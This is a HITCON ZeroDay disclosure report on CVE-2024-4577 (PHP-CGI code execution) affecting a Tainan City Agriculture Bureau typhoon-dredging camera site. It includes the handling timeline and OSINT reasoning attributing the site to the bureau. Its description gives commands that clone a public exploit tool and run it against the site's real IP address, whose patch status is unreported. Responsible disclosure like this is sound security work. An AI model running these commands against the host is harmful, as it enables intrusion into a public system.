台南市農業局 凱米颱風農田清淤監控影像系統 CVE-2024-4577 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2025-00820
  •  發信 Vendor: 台南市農業局
  • Title: 台南市農業局 凱米颱風農田清淤監控影像系統 CVE-2024-4577
  • Introduction: CVE-2024-4577

處理狀態

目前狀態

公開
Last Update : 2025/09/23
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2025/07/24 21:46:59 : 新提交 (由 d3r4ilm3n7 更新此狀態)
  • 2025/07/26 10:38:52 : 新提交 (由 d3r4ilm3n7 更新此狀態)
  • 2025/07/28 16:12:40 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/08/06 17:30:53 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/08/06 17:30:53 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/08/06 17:30:53 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/09/23 03:00:06 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2025-00820
  • 通報者:abby8050 (d3r4ilm3n7)
  • 風險:高
  • 類型:程式碼執行 (Code Execution)

參考資料

攻擊者可藉由此漏洞執行惡意程式碼,進行如操縱網站作業系統等惡意行為。
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://221.120.2.107/CH1/

敘述

git clone https://github.com/Night-have-dreams/php-cgi-Injector.git
python3 exploit.py -u http://221.120.2.107/

註:判斷漏洞單位的方法
一、網站的Title: 凱米颱風農田清淤監控影像
圖片
二、OSINT發現監控影像的頻道3與台南市府新聞(往下滑)的第三張圖的山的形狀一樣
http://221.120.2.107/CH1/
https://www.tainan.gov.tw/News_Content.aspx?n=13370&s=8686304#
圖片
三、經查,新聞報導的單位「台南市農業局」曾發包「臺南市政府辦理凱米風災八掌溪溢堤農田清除泥砂復耕計畫」委託設計監造
https://www.tainan.gov.tw/News_Content2.aspx?n=4966&s=8713688
四、因此判定「凱米颱風農田清淤監控影像系統」的負責單位為「台南市農業局」。

[提醒]所使用的CH38XDRV驅動程式是中國製的:
圖片

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;